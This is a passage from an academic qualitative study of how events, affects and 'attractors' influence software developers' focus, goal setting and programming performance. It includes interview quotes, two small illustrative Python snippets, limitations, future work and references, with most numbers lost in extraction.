other issue at work.”—p we further distinguish public events from private events. public events are those that could be observed by a third person. the in-field memo is an exemplar public event. private events are known to oneself only, even if they are coming from the real world. for example, the event described in interview quote was real and coming from the real world. however, it was not observable by a third person. events have often an episodic nature, as p and p noted on several occasions. however, private events can also be reflections, realizations, memories, and situations as with psychological objects. . interviewer: “have you focused better on your programming task today?” p : “yes, today went better [than usual]. it’s probably when you do that [programming] alone that i am more.. it is more difficult, to write code. 
when i am working with somebody it goes better, you can work better.” in interview quote , p described the general situation, or a summary of the work day events with respect to usual situations. situations can be causation chains or aggregations of previous events. the participants do not need to be aware of events as merely events or as situations, as it does not make any difference to them. we are not representing situations in fig. because we still consider them events. the rest of the paper provides numerous other examples of events. affects during the development process, several affects have been triggered by events and felt by the developers. we coded only affects which had been directly mentioned by p and p . the following are the detected positive and negative affects (respectively) felt during the development cycle. accompanied, accomplished, attracted, contented, dominating, enjoyed, excited, fun, good, gratitude, happy, illuminated, motivated, optimistic, positive, satisfied, serene, stimulated, supported, teased, welcomed. angry, anxious, bored, demoralized, demotivated, depressed, devastated, disinterested, dominated, frustrated, guilty, loneliness, lost, negative, pissed off, sad, stagnated, unexcited, unhappy, unsatisfied, unstimulated, unsupported, worried. careful readers might turn up their nose here: as we wrote in graziotin, wang & abrahamsson ( b), affects are not motivation, as they are not job satisfaction, etc. yet, affects are important components of these psychological constructs, and studying complex multifaceted constructs like motivation would require different approaches and different measurement instruments. for this reason, if the participants only stated that they felt motivated or satisfied, we considered them as affects, as it might well be the case that they were expressing emotional judgments about such constructs. in any case, the inclusion or exclusion of such terms as affects would not change the results of this study. our qualitative results on the perceived affects agree with the quantitative results of wrobel ( ) and müller & fritz ( ), which indicated that developers do feel a very broad range of affects in the software development process. examples of events that caused positive and negative affects (respectively), coded using the gerund principle of charmaz’s ( ) method for analyzing qualitative data, are the following.
‘feeling contented because a very low number of code changes caused big achievement in terms of quality [or functionality],’ ‘feeling gratitude towards a tool,’ ‘feeling attracted by a junk of code because of anticipating its value for the end user,’ ‘feeling motivated because personal issues are now out clear,’ ‘feeling supported because of the brought automation of a framework,’ ‘feeling serene because of a low workload right after a high workload,’ ‘feeling happy because of sensing the presence of a team member after reconciliation.’ ‘feeling alone [or unsupported] while working [or by a team member],’ ‘feeling anx- ious because of a sudden, not localizable bug that ruined the day,’ ‘feeling anxious by not understanding the code behavior,’ ‘feeling bored by implementing necessary but too static details [e.g., aesthetic changes instead of functionalities],’ ‘feeling frustrated by the different coding style of a team member,’ ‘feeling angry by failing to integrate [or extend] an external component,’ ‘feeling stagnated in life [or job, or studies],’ ‘feeling unstimulated because of a too analytic task.’ according to previous research, psychological objects—sometimes in the form of events, sometimes as stimula—trigger affects all the time, and an individual is under a particular affect or a blend of affects all the time (russell, ). sometimes, these affects will be perceived strongly. sometimes, they will not be perceived at all despite their presence. a failure to attribute an affect to an event does not demise the affect itself. this affect misattribution coincides with some theories of moods (fisher, ; weiss & cropanzano, ), which consider affect as non attributed emotions or simply as free-floating, unattributed affect (russell, ). graziotin et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. attractors we observed that some events had a particular affective meaning to the participants. these affective experiences were assumed high importance to the participants with respect to other affective experiences; thus, we called them attractors. attractors are affects, which earn importance and priority to a developer’s cognitive system. at a very basic instance, they gain the highest possible priority and emphasis to a developer’s consciousness, to the point that behaviors associated to the attractor can be observed as it is experienced. an example can be offered by quote below. . p : “i did a really good job and fixed things also due to sublime text (st).” interviewer: “what has st done for you?” p : “when you copy/paste code around and refactor, st offers you at least three different ways for doing search and replace. it is really advanced.” interviewer: “would another tool make a difference to your work instead?” p : “with another editor or an ide it would be another story, especially if an editor tries to do too much, like eclipse. i think that the compromise between functionality and usability of st is way better.” interviewer: “do you think that st is enhancing your productivity then?” p : “absolutely. i was extremely excited by these features and they pushed me to do more and more.” interviewer: “were you actually thinking about this while you were working?” p : “definitely. first, i turned the monitor towards p and showed him the magic. 
but i felt good for the rest of the day, and i accomplished more than what i hoped i could do.” in interview quote , p offered an insight regarding the affects triggered by a software development tool. the excitement toward the tool features was an attractor to p . the attractor became central to the developer subjective conscious experience, not just an underlying affect. moreover, the behavior caused by the experience of the attractor was directly observable. interview quote emphasizes that attractors are not necessarily concerns or negative in nature. interview quote provides instead an example of a negative attractor. p realized that a non work-related event was not desirable, thus generating negative affects. what happened to his mother was important and demanded his attention. p was consciously experiencing the negative attractor, and the appraisal of such attractor had consequences to his way of working. attractors are not necessarily stronger than general affects for gaining a developer’s subjective conscious experience. they might just be there and still have an impact. we can access them retrospectively. interview quote is an example of such occurrence. . “i am not progressing.. in the working environment.. with my university career. with life. i feel behind everybody else and i do not progress. and i am not even sure about what i want to do with my life. i got no visual of this.”—p moreover, interview quote shows that attractors are not always caused by single events. attractors can become reflections on a series of events as a consequence of them and as a summation of them. graziotin et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. another example of reflections of a series of events that have however an impact on a developer’s subjective consciousness is shown in interview quote . p was having a life crisis which resulted in a loss of the vision of his own life. . “when i was alone at home, i could not focus on my programming task. the thought of me not progressing with life did often come to my mind. there i realized that i was feeling depressed.”—p in interview quote , the participant had a negative depressed attractor with the attached meaning i am not progressing with life. the rumination associated with this attractor was strong and pervaded p personal experience and his everyday life of that period. attractors are part of the personal sphere as much as affects are—indeed, they are special affects for us. in the software process improvement literature, the term concern has been used as commitment enabler (abrahamsson, ). the commitments are formed in order to satisfy such concerns, i.e., needs (flores, ). attractors are not concerns as employed by abrahamsson ( ). an important difference is that concerns are linked to actions, i.e., actions are driven by concerns. on the other hand, attractors are affects, and affects are not necessarily concerns, nor do they necessarily cause immediate actions. under our current theoretical framework, a blend of affects constitutes an individual’s happiness, at least under the hedonistic view of happiness (haybron, ). according to this view, being happy coincides with the frequent experience of pleasure; that is, happiness is reduced to a sequence of experiential episodes (haybron, ). frequent positive episodes lead to feeling frequent positive affects, and frequent positive affects lead to a positive affect balance (diener et al., ). 
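as a minimal illustration of the affect balance notion cited above (diener et al.), the balance can be sketched as the relative frequency of positive versus negative affective episodes. the episode labels below are hypothetical, and the computation is only a sketch of the hedonistic view, not the measurement instrument used in this study.

```python
# minimal sketch of the hedonic "affect balance" idea referenced above:
# happiness approximated by the frequency of positive versus negative
# affective episodes. episode labels are hypothetical illustrations.
from collections import Counter

episodes = ["positive", "positive", "negative", "positive", "negative", "positive"]

counts = Counter(episodes)
affect_balance = (counts["positive"] - counts["negative"]) / len(episodes)

# a value above zero suggests a mainly positive affect balance.
print(f"affect balance: {affect_balance:+.2f}")
```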
lyubomirsky, king & diener ( ) consider a person happy if the person’s affect balance is mainly positive. however, we have just stated in this section that some developers’ affects are more important than other affects. let us now be more specific. as argued by the philosopher haybron ( ), a quantitative view of happiness based solely on frequency of affects is psychologically superficial because some affects do not have distinct episodes or attributions (as in moods). even more, haybron ( ) has seen happiness as a matter of a person’s affective condition where only central affects are concerned. we see a similarity between attractors and haybron ( ) central affects. as attractors are important affects, we agree that they are a strong constituent of the happiness of the individuals. however, non attractors could be central affects, as well. in our observations, we saw that attractors are also affects that are easily externalized by the participants, and we will show that their originating events are more visible to them. furthermore, we will show that attractors are more linked to the focus and the developers’ performance. thus, we differentiate them from central affects. the participants could sometimes realize the affective meaning of attractors by themselves, as in quote . there is often the need to externalize them in order for an observer to feel them. we found that sometimes, externalizing affects is alone beneficial, as seen in the next section. graziotin et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. interventions while the presence of researchers has always an influence on the participant’s behav- iors (franke & kaul, ), it happened twice that our interaction with the participants had a clear effect on their feelings and behaviors. we call such events interventions. interventions are events—as shown in fig. by the uml-like grey arrow with a white arrowhead—that mediate the intensity of already existing negative attractors, thus reducing them as much as possible to normal affects. after externalizing his depressed state in interview quote , p continued as follows: . “what we were doing was not ‘in focus.’ the result really didn’t matter to me. to my eyes, we were losing time. however, once i’ve told you what i told you [the personal issues] you know that as well. it is not that i am hiding or that i am inventing things out..i now have no more the possibility to wriggle anymore. i told you why i was not there and i am feeling better already. i am now here for two days, and i feel way better than before.”—p . the field memos provided more evidence on the effectiveness of interventions. for example, during the reconciliation, which happened at the beginning of week , the developers had frequent soft fights. p battles fiercely for his opinions and design strategies. however, he is listening to p opinions. on the other hand, p seems more interested to get stuff done, and he seems less prone to listen to p . p is probably realizing this and responds using passive-aggressive modes. some not-so-very nice words fly. p and p are less aggressive with each other. my proposal to let them express their opinions and to invite them to listen to each other seems to have a positive effect. a solution, albeit influenced by me, seems to have been reached. a field memo six days after the reconciliation was much more positive. p and p have been working with an almost stable pace. 
there does not seem to be an elephant in the room anymore. both of them smile often and joke with each other. you can feel them happier than before. i often see p and p showing their results to each other. the work seems way more productive than last week. even personal issues were having less impact on p as he revealed in an interview nine days after the reconciliation. . “my personal issues are having a minor impact on my productivity, despite the fact that my mind wonders in different places. it is because we are now working well together and share a vision.”—p interventions in fig. are reached by dashed arrows, which start from affects and attractors, and have a dashed arrow pointing to focus. the dashed arrows, together with the labels mediated by and amplify (or reduce) drive on, indicate alternative paths in the process. that is, affects and attractors are mediated by interventions, which amplify or reduce their drive on the focus. graziotin et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. these interventions suggest that a mediator is a useful figure in a software development team. the mediator should be able to gently push the team member to let out their opinions, views, and affects. a more concrete example could be an agile coach or a team leader according to the team settings. focus—progressing and goal setting in this section, we explain the construct of focus, which is related to progressing toward goals and the setting of such goals. the focus often referred to a general mental focus, e.g., “i was in focus after i could refactor all that code using sublime text search-and-replace capacity.”—p , which usually matched a focus on the current chunk of code. however, the focus on the current chunk of code was with respect to a goal. p mentioned focus in interview quote , where he told the interviewer that he could not focus on the programming task while at home, because of the realization of being depressed. a more tangible focus on the code at hand was portrayed by p in the following interview quote. . “after our [between p and p ] reconciliation and after the meeting with [the head nurse], i often developed in full immersion. when i am in full immersion mode, nothing exists except what i am doing. i have a goal in mind and i work toward it. i don’t think about anything else but my goal and my progress towards it.”—p during the last interview, p was directly asked about the way he focuses while developing software and what he thinks about. besides the full immersion mode that p described in quote , he described a “lighter mode of immersion. i enter this mode when i am tired, when i write less functional aspects of the code.” but also “when i am interrupted by negative news or when i focus my attention more on some problems.” in quote , p shared his view on negative affects and how they hinder performance by changing the way he perceived events as attractors. . “my negative thoughts have been the same lately—more or less–but i sometimes change the way i look at them. it is often positive, but it is often negative, too. maybe i realize this more when i have a negative attitude towards them. it influences my work in a particular way: my concerns become quicksand.”—p our focus appears to be similar to the flow as depicted by csikszentmihalyi ( ), and found in the related work by meyer et al. ( ) and müller & fritz ( ), which was described as an attention state of progressing and concentration. 
additionally, the participants often mentioned the term ‘vision,’ which was meant as the “ability to conceive what might be attempted or achieved.” (oed online, ). for this reason, we preferred using the term goal setting. the participants linked the focus and the capacity of setting goals. goal settings has an established line of research in organizational behavior and psychology—one of the seminal works is by locke ( )—that would deserve its own space in a separate article. it involves the development of a plan, which in our case is internalized, designed to guide an individual toward a goal (clutterbuck, ). those goals found in our study were related to future achievements in the short and graziotin et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. long run, i.e., the task and the project. one example of task goals lies in the interview quote . whenever the focus of attention was on the current code melted with the goal setting of task and project, the performance was reported and observed as positive. however, if something was preventing the focus on the current code—now—and the focus on the goal or the goal setting of the task or project—then—the performance was reported and observed as negative. p summarized these reflections concisely in quote . . “it does not matter how much it is actually going well with the code, or how i actually start being focused. then it [my thoughts about my personal issues] comes back into mind. it is like a mood. i cannot define it in any way. but it is this getting rid of a thought, focusing back to work and the task goal. here [shows commit message] i wanted to add the deletion of messages in the nurses’ log. but when it happens, i lose the task vision. what was i trying to accomplish? why was i trying to do this? it happens with the project vision, too. i don’t know what i am doing anymore.”—p the project goal setting is similar to the task goal setting. the difference is that project goal setting is the capacity of perceiving the completion of a project in the future and visualizing the final product before its existence as p outlined in interview quote . . “after we talked to [the head nurse], we gathered so much information that we over- looked or just did not think about. [...] between that and the time you [the researcher] invited us to speak about our issues and mediated among our opinions, we had a new way to see how the project looked like. the product was not there still, but we could see it. it was how the final goal looked like.”—p there is a link between focusing on the code and focusing on the task goal. staying focused on the code meant staying focused on the now (and here). it is the awareness of the meaning of each written line of code towards the completion of a task. focusing on the task and project goals meant staying focused on the then (and there). it was meant as the capacity of envisioning the goal at the shorter term (the task) and the overall goal of the project. at the same time, focusing on the task and the project meant the possibility to define a task completion criteria, the awareness of the distance towards the completion of such task, and to re-define the goal during the work day. our findings are in line with those of meyer et al. ( ), where the participants in a survey perceived a productive day as a day where “they complete their tasks, achieve a planned goals or make progress on their goals” (p. ). 
the number of closed work items, e.g., tasks and bugs, was the most valued productivity measurement among developers. the full immersion mode mentioned by p in interview quote resembles the flow depicted by csikszentmihalyi ( ) and mentioned in the related work by meyer et al. ( ) and müller & fritz ( ). performance the performance was generally understood by the participants as their perceived effectiveness in reaching a previously set expectation or goal. or, whenever then became now. . “last week has been chaotic. we worked very little on the code. p played around with the programming framework. p tried to adapt an example program to fit our needs. so, p studied the chosen framework. i can say that p was productive. i spent my time doing refactoring and little enhancements of what was already there. little functionality was developed so far. in a sense, we still performed well. we did what we were expecting to do. even if i did so little. i still laid down the basis for working on future aspects. so yeah, i am satisfied.”—p . interviewer: “what happened during this week?” p : “well, it happened that..i did not behave correctly in this week. i could not do a single commit.” we observed that the affects have an impact on the programming performance of the developers. this impact works by driving the focus that developers have on the currently focused code, the ongoing task, or the project itself. we note that the aim of this study is to offer a theory of the impact of affects on performance while programming rather than to propose a performance or productivity theory. a plethora of factors influence the performance of developers—see wagner & ruhe ( ) and sampaio et al. ( ) for a comprehensive review of the factors—and affects are one of them, although they are not yet part of any review paper. at the same time, software development performance is composed of several complex interrelated constructs—see petersen ( ) for a review of productivity measurements—to which we add those driven by cognitive processes and also influenced by affects, e.g., creativity and analytic problem-solving capability (graziotin, wang & abrahamsson, a). p suggested already, in interview quote , that the excitement caused by the discovery of the useful search-and-replace functionalities in his editor had pervaded his work day. this positive attractor caused him to be productive also when not using such functionalities. p could also offer cases of the opposite side, like the one in quote . . “i was lost in my own issues. my desire to do stuff was vanishing because i felt very depressed. there was no point in what i was currently doing, to the point that i could not realize what i had to do.”—p . more precisely, positive affects have a positive impact on the programming performance—as they drive the focus positively—while negative affects have a negative impact on the programming performance—as they drive the focus negatively. while most of the previous quotes are examples on the negative side, quote and the following quote are instances of the positive case. . p : “i now feel supported and accompanied by p . we are a proper team.” interviewer: “what has changed?” p : “it’s that now p is active in the project. before [the reconciliation] p was not here at all.
[...] if he joined after our meeting with [the head nurse], there was the risk of seeing him as an impediment instead of a valid resource and team member. now, i feel happier and more satisfied. we are working very well together and i am actually more focused and productive.” a positive focus has a positive effect on programming performance. but a focus on the code toward task or project goals (or a combination of them) has an even stronger positive impact on the programming performance. we provide some codes related to the consequences of positive and negative affects (respectively) while programming. ‘limiting the switch to personal issues because of feeling accompanied by a team member,’ ‘switching focus between the task and the positive feelings caused by a tool makes productive,’ ‘focusing better on code because of the positive feelings brought by reconciliation,’ ‘focusing less on personal issues [more on the code] because of a sense of being wanted at work,’ ‘focusing more on code because of feeling supported and in company,’ ‘committing code frequently if feeling in the company of people.’ ‘abandoning work because of negative feelings fostered by negative events,’ ‘avoiding coming to work because of lost vision [and depression],’ ‘avoiding committing working code during the day because of loneliness,’ ‘choosing an own path because of the loneliness,’ ‘switching focus between personal issues and the work-related task prevents solving programming tasks,’ ‘losing focus often when feeling alone,’ ‘losing the project vision because of quicksanding in negative affects,’ ‘not reacting to team member input because of bad mood,’ ‘realizing the impediments brought by personal issues when they are the focus of attention,’ ‘trying to self-regulate affects related to negative events and thoughts lowers performance,’ ‘underestimating an achievement because of loneliness,’ ‘worrying continuously about life achievements and avoiding work.’ comparison of the theory with related work the proposed theory can be seen as a specialized version of affective events theory (aet, weiss & cropanzano, ). it provides an affect-driven theory explaining how events, both work-related and not, impact the performance of developers through their focus and goal setting while programming. therefore, our study produces evidence that aet is an effective macrostructure to guide research on affects on the job in the context of software development. at the same time, our proposed theory is reinforced by the existence of aet itself. we also note that our theory is partially supported by müller & fritz’s ( ) independent study—built upon one of our previous studies (graziotin, wang & abrahamsson, a)—which was conducted at about the same time as the present study (at our submission time, the work by müller & fritz ( ) had just been accepted for inclusion in the icse proceedings but was not yet formally published; we obtained their work through an institutional repository of preprints). among their findings, the self-assessed progressing with the task is correlated with the affects of developers; the most negative affects were correlated with less focus on clear goal settings, and positive affects were linked with focusing and progressing toward the set goals. finally, our findings are in line with the general findings of goal-setting research.
that is, the task performance is positively influenced by shared, non conflicting goals, provided that there are fair individuals’ skills (locke & latham, ). happy, therefore productive or productive, therefore happy? let us now reason a little on the causality aspects between affects and performance. we note that the participants have always explicitly stated or suggested that the influence of affects on performance is of a causality type. some researchers have warned us that there might instead be a correlation between the constructs, as well as a double causality (i am more productive because i am more happy, and i am more happy because i am more produc- tive). indeed, so far in our previous studies (graziotin, wang & abrahamsson, a; grazi- otin, wang & abrahamsson, a) we have argued for correlation, not causation. in the present study, we could not find support in the data for a double causation, but for a causality chain happy, therefore productive, in line also with related research graziotin et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. (wrobel, ). however, it seems reasonable that we are happier if we realize our positive performance. we speculate here that a third, mediating option might exist. in the proposed theory, and in several other theories in psychology, being happy is reduced to frequent feeling of positive affects (haybron, ). as argued by haybron ( ), the centrality of affects might be relevant, as well. haybron ( ) stated, as an example, that the pleasure of eating a cracker is not enduring and probably not affecting happiness; therefore, it is considered a peripheral affect. peripheral affects arguably have smaller—if not unnoticeable—effects on cognitive activities. it might be the case that the positive (negative) affects triggered by being productive (unproductive) do exist but have a small to unnoticeable effect on future productivity. however, this is outside the scope of this study. we report our backed up speculation as causation for future work. conclusion in this qualitative, interpretive study, we constructed a theory of the impact of affects on software developers with respect to their programming performance. as far as we know, this is the first study to observe and theorize a development process from the point of view of the affects of software developers. by echoing a call for theory building studies in software engineering, we offer first building blocks on the affects of software developers. for this reason, we designed our theory development study using a small sample adhering to guidelines for generating novel theories, thus enabling the development of an in-depth understanding of an otherwise too complex and complicated set of constructs. the theory conceptualization portraits how the entities of events, attractors, affects, focus, goal settings, and performance interact with each other. in particular, we theorized a causal chain between the events and the programming performance, through affects or attractors. positive affects (negative affects) have a positive (negative) impact on the programming task performance by acting on the focus on code, and task and project goals. the theory introduces the concept of attractors, which are affects that earn importance and priority to a developer’s cognitive system and, often, to their conscious experience. attractors have an even higher impact on programming performance than ordinary affects. 
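to make the statements of relationships summarized above easier to inspect, the following toy sketch encodes our reading of the theorized constructs and their signed links (events trigger affects and attractors, interventions reduce negative attractors, affects and attractors drive focus, and focus drives performance). it is an illustrative data structure, not an executable or quantitative model of the theory, and the construct names are our own shorthand.

```python
# toy encoding of the theorized statements of relationships.
# signs follow the +/++/-/-- convention of the theory figure; this is an
# illustrative data structure, not a quantitative model.
relationships = [
    ("event",        "triggers", "+",  "affect"),
    ("event",        "triggers", "+",  "attractor"),   # affects of particular importance
    ("intervention", "reduces",  "-",  "attractor"),   # a mediator defuses negative attractors
    ("affect",       "drives",   "+",  "focus"),
    ("attractor",    "drives",   "++", "focus"),       # stronger drive than ordinary affects
    ("focus",        "improves", "++", "performance"), # focus on code plus task/project goals
]

def downstream(construct):
    """list the constructs directly influenced by the given construct."""
    return [(verb, sign, target) for source, verb, sign, target in relationships
            if source == construct]

print(downstream("attractor"))  # [('drives', '++', 'focus')]
```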
finally, we also provided evidence that fostering positive affects among developers boosts their performance and that the role of a mediator bringing reconciliations among the team members might be necessary for successful projects. contributions and implications our study offers multiple contributions and implications. the theoretical contributions lie in the theory itself. the theory incorporates the impact of affects on performance through an influence on the focus of developer’s consciousness on coding and on several aspects of goal settings (task, project). in addition, we introduced the concept of attractors for developers, which is a novel construct based on affects and events at different spheres (work-related and not, private or public). the theory is proposed as part of basic science of software engineering, and it is open to falsification and extension. graziotin et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. as stated by lewin, “there is nothing quite so practical as a good theory” (lewin, ). the practical implication of our study is that, despite the idea among managers that pressure and some negative feelings help in getting the best results out, there is growing evidence that fostering (hindering) positive (negative) affects of software developers has a positive effect on the focus on code, and task and project goal settings, and, consequently, on their performance. additionally, we found evidence that a mediator role to reconcile the developers’ issues and conflicts is a way to foster positive affects and mediate negative attractors among them. the proposed theory can be employed as a guideline to understand the affective dynamics in a software development process. the theory can be used to foster a better environment in a software development team and to guide managers and team leaders to enrich their performance by making the developers feel better. on the other hand, our conceptualized theory can guide the team leaders to understand the dynamics of negative performance when it is linked to negative affects. limitations the most significant limitation of this research to be mentioned lies in its sample. although it is very common for software engineering studies to recruit computer science students as participants to studies (salman, misirli & juristo, ), for some readers this might still be considered a limitation. first, it is true that our participants were enrolled to a bsc study in computer science, but they both had a working history as freelancers in companies developing websites and web applications. while our developers did not have to be concerned about assets and salaries, they were paid in credit points and a final award in terms of a bsc thesis project. tichy ( ) and kitchenham et al. ( ) argued that students are the next generation of software professionals as they are close to the interested population of workers, if not even more updated on new technologies. indeed, the empirical studies comparing students in working settings with professionals did not find evidence for a difference between the groups (svahnberg, aurum & wohlin, ; berander, ; runeson, ; höst, regnell & wohlin, ; salman, misirli & juristo, ). the conclusions from the previous studies are that students are indeed representatives of professionals in software engineering studies. the non-inclusion of female participants might be considered a further limitation of this study. 
there is a widespread popular conception that there are gender differences in emotionality (mcrae et al., ). evidence has been found for gender differences at the neural level associated with reappraisal, emotional responding, and reward processing (mcrae et al., ), for females having greater reactivity to negative stimuli (gardener et al., ), and for the adoption of different emotion regulation strategies (nolen-hoeksema & aldao, ). while more studies on gender differences are needed, as the produced evidence is not yet sufficient (nolen-hoeksema, ), it might be the case that the inclusion of a female developer would have made the dataset richer, and perhaps would have led to a more gender-balanced theory.

while we argued extensively about the choice of the sample size in the section theory construction and representation, we repeat here that there was the need to keep the phenomenon under study as simple as possible given its complex nature (barsade & gibson, ). furthermore, when novel theories are to be developed in new domains, such as software engineering, a small sample should be considered (järvinen, ). this strategy, while sometimes seen as limiting, pays off especially for setting out basic building blocks (weick, ). as argued by bendassolli ( ), even one observation could be sufficient for theorizing insofar as "phenomena should be directly explained by theory, and only indirectly supported by the data" (quoted from section . ). our choice of the small sample size was seen as a benefit for the purposes of this explanatory investigation. the reason is that in a real company, the source of events is vast and complex. there are team dynamics with complicated, and even historical, reasons that are harder to grasp—triggering a complex, powerful network of affects (barsade & gibson, )—thus lifting the study's focus away from the programming itself.

future work

we have three directions of research to suggest to the readers. the first one is an immediate continuation of our study. as our study was explanatory, we suggest future research to test the proposed theory and to quantify its relationships in quantitative studies, in the software engineering field but also in other domains, to understand if and how the specifics particular to the software engineering context affect the applicability of our theory. although quantifying the impact of attractors was beyond the scope of this study, we feel that negative attractors triggered by non-work-related events and positive attractors triggered by work-related events have the strongest impact on the performance of software developers. furthermore, this study focused on the dimensions of positive and negative affects. it is expected that different types of affects and attractors matter more than others, and have different impacts on focus and performance. we leave future studies the option to study discrete affects, e.g., joy, anger, fear, frustration, or different affect dimensions, e.g., valence, arousal, and dominance. our second suggestion for future studies is to focus on dynamic, episodic process models of affects and performance where time is taken into consideration. the underlying affects of developers change rapidly during a workday. the constituents and the effects of such changes should be explored.
additionally, exploring the dynamics of affects turning into attractors (and possibly vice versa) and what causes such changes will provide a further understanding of the effectiveness of interventions for making developers feel happier, thus more productive. finally, our third direction for future research is to broaden the focus to (1) artifacts other than code, such as requirements and design artifacts, and (2) understanding the complex relationship of affects and software developers' motivation, commitment, job satisfaction, and well-being.

acknowledgements

we thank our two participants, who openly, actively, and unhesitatingly collaborated during the research activities. we are grateful for the feedback provided by two anonymous reviewers, which helped us improve the manuscript in several aspects, including clarity.

additional information and declarations

funding
the authors received no funding for this work.

competing interests
the authors declare there are no competing interests.

author contributions
• daniel graziotin conceived and designed the experiments, performed the experiments, analyzed the data, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper.
• xiaofeng wang performed the experiments, analyzed the data, wrote the paper, reviewed drafts of the paper.
• pekka abrahamsson analyzed the data, wrote the paper, reviewed drafts of the paper.

references

abrahamsson p. . rethinking the concept of commitment in software process improvement. scandinavian journal of information systems ( ): – .
amabile t. . creativity and innovation in organizations. in: harvard business school background note, pages – .
amabile t, barsade sg, mueller js, staw bm. . affect and creativity at work. administrative science quarterly ( ): – doi . /asqu. . . . .
barsade sg, gibson de. . group emotion: a view from top and bottom. research on managing groups and teams ( ): – .
barsade sg, gibson de. . why does affect matter in organizations? academy of management perspectives ( ): – doi . /amp. . .
beal dj, weiss hm, barros e, macdermid sm. . an episodic process model of affective influences on performance. the journal of applied psychology ( ): – doi . / - . . . .
beedie c, terry p, lane a. . distinctions between emotion and mood. cognition & emotion ( ): – doi . / .
bendassolli pf. . theory building in qualitative research: reconsidering the problem of induction. forum qualitative sozialforschung/forum: qualitative social research ( ): part i.
berander p. . using students as subjects in requirements prioritization. in: proceedings international symposium on empirical software engineering (isese ). piscataway: ieee, – .
bradley mm, lang pj. . measuring emotion: the self-assessment manikin and the semantic differential. journal of behavior therapy and experimental psychiatry ( ): – doi . / - ( ) - .
brief ap, weiss hm. . organizational behavior: affect in the workplace. annual review of psychology : – doi . /annurev.psych. . . .
charmaz k. . constructing grounded theory: a practical guide through qualitative analysis. introducing qualitative methods, st edition, vol. .
london: sage publications.
ciborra c. . the labyrinths of information: challenging the wisdom of systems. st edition. new york: oxford university press.
clutterbuck d. . coaching reflection: the liberated coach. coaching: an international journal of theory, research and practice ( ): – doi . / .
corbin jm, strauss al. . basics of qualitative research: techniques and procedures for developing grounded theory. rd edition, vol. . london: sage publications.
creswell jw. . research design: qualitative, quantitative, and mixed method approaches. rd edition, vol. . thousand oaks: sage publications.
csikszentmihalyi m. . finding flow: the psychology of engagement with everyday life. st edition, vol. . new york: basic books.
de dreu ckw, nijstad ba, bechtoldt mn, baas m. . group creativity and innovation: a motivated information processing perspective. psychology of aesthetics, creativity, and the arts ( ): – doi . /a .
diener e, wirtz d, tov w, kim-prieto c, choi d, oishi s, biswas-diener r. . new well-being measures: short scales to assess flourishing and positive and negative feelings. social indicators research ( ): – doi . /s - - -y.
easterbrook s, singer j, storey m-a, damian d. . selecting empirical methods for software engineering research. in: shull f, singer j, sjøberg dik, eds. guide to advanced empirical software engineering. london: springer-verlag, – doi . / - - - - .
eisenhardt k. . building theories from case study research. academy of management review ( ): – .
fagerholm f, ikonen m, kettunen p, münch j, roto v, abrahamsson p. . performance alignment work: how software developers experience the continuous adaptation of team performance in lean and agile environments. information and software technology : – doi . /j.infsof. . . .
feldt r, angelis l, torkar r, samuelsson m. . links between the personalities, views and attitudes of software engineers. information and software technology ( ): – doi . /j.infsof. . . .
feldt r, torkar r, angelis l, samuelsson m. . towards individualized software engineering. in: proceedings of the international workshop on cooperative and human aspects of software engineering (chase ' ). new york: acm press, – .
fischer g. . cognitive view of reuse and redesign. ieee software ( ): – doi . /ms. . .
fisher cd. . mood and emotions while working: missing pieces of job satisfaction? journal of organizational behavior ( ): – doi . /(sici) - ( ) : < ::aid-job > . .co; -m.
fisher cd, ashkanasy nm. . the emerging role of emotions in work life: an introduction. journal of organizational behavior ( ): – doi . /(sici) - ( ) : < ::aid-job > . .co; - .
flores f. . information technology and the institution of identity. information technology & people ( ): – doi . / .
franke rh, kaul jd. . the hawthorne experiments: first statistical interpretation. american sociological review ( ): – doi . / .
gardener ekt, carr ar, macgregor a, felmingham kl. . sex differences and emotion regulation: an event-related potential study.
plos one ( ):e doi . /journal.pone. .
geertz c. . the interpretation of cultures: selected essays. vol. . new york: basic books.
glaser bg. . theoretical sensitivity: advances in the methodology of grounded theory. mill valley: the sociology press.
glaser bg, strauss al. . the discovery of grounded theory: strategies for qualitative research. chicago: aldine.
graziotin d, wang x, abrahamsson p. a. happy software developers solve problems better: psychological measurements in empirical software engineering. peerj ( ):e doi . /peerj. .
graziotin d, wang x, abrahamsson p. b. software developers, moods, emotions, and performance. ieee software ( ): – doi . /ms. . .
graziotin d, wang x, abrahamsson p. a. do feelings matter? on the correlation of affects and the self-assessed productivity in software engineering. journal of software: evolution and process ( ): – doi . /smr. .
graziotin d, wang x, abrahamsson p. b. the affect of software developers: common misconceptions and measurements. in: ieee/acm th international workshop on cooperative and human aspects of software engineering, firenze, italy. piscataway: ieee computer society, – doi . /chase. . .
graziotin d, wang x, abrahamsson p. c. understanding the affect of developers: theoretical background and guidelines for psychoempirical software engineering. in: th international workshop on social software engineering (sse ), bergamo, italy. available at http://arxiv.org/abs/ . .
gregor s. . the nature of theory in information systems. mis quarterly ( ): – .
harris ad, mcgregor jc, perencevich en, furuno jp, zhu j, peterson de, finkelstein j. . the use and interpretation of quasi-experimental studies in medical informatics. journal of the american medical informatics association ( ): – doi . /jamia.m .
haybron dm. . happiness and pleasure. philosophy and phenomenological research ( ): – doi . /j. - . .tb .x.
haybron dm. . on being happy or unhappy. philosophy and phenomenological research ( ): – doi . /j. - . .tb .x.
haybron dm. . do we know how happy we are? on some limits of affective introspection and recall. nous ( ): – doi . /j. - . . .x.
heath h, cowley s. . developing a grounded theory approach: a comparison of glaser and strauss. international journal of nursing studies ( ): – doi . /s - ( ) - .
höst m, regnell b, wohlin c. . using students as subjects—a comparative study of students and professionals in lead-time impact assessment. empirical software engineering ( ): – doi . /a: .
järvinen p. . on research methods. st edition. tampere: opinpajan kirja.
